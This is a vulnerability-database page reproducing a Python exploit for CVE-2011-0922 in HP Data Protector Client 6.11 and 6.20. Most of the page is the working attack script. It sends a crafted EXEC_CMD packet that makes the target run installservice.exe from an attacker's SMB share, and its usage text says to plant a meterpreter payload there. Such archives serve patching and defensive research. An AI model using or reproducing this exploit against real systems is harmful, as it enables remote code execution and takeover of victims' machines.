Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

HP Data Protector Client 6.11 / 6.20 Remote Code Execution

Related Vulnerabilities: CVE-2011-0922  
Publish Date: 20 Jun 2012
Author: Ben Turner
Source 
                							

                #!/usr/bin/env python
 
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
 
 
import socket
import sys
import binascii
 
if len(sys.argv) != 4:
    print ""
    print "\033[0;31mUsage: ./hp_protector.py <Target IP> <Port> <Reverse IP> \033[0m"
    print ""
    print "\033[0;32mMake sure you create a meterpreter payload and a share with the following \\\\<Reverse IP>\\Omniback\\i386\\installservice.exe\033[0m"
    print "\033[0;32mAlso make sure the SYSTEM account on windows can access your share, this is not always trivial\033[0m"
    print ""
    sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
lhost = sys.argv[3]
 
# Create a Share with the following:
# Ensure you can access that share with the SYSTEM account on a machine -
#
# \\ipaddress\Omniback\i386\installservice.exe
 
 
b = ''
 
for char in lhost:
    a = "\x00"+char
    b = b + a
 
#print b
 
 
payload = ("\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
+ b +
"\x00\x00\x00\x20\x00\x30\x00"
"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
"\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
"\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
"\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
+ b +
"\x5c\x00\x5c\x00\x4f\x00"
"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
"\x5c\x00\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
"\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
"\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00")
 
print payload
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
while 1:
        data = s.recv(4096)
        if data:
                print data
        else:
                break
s.close()

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started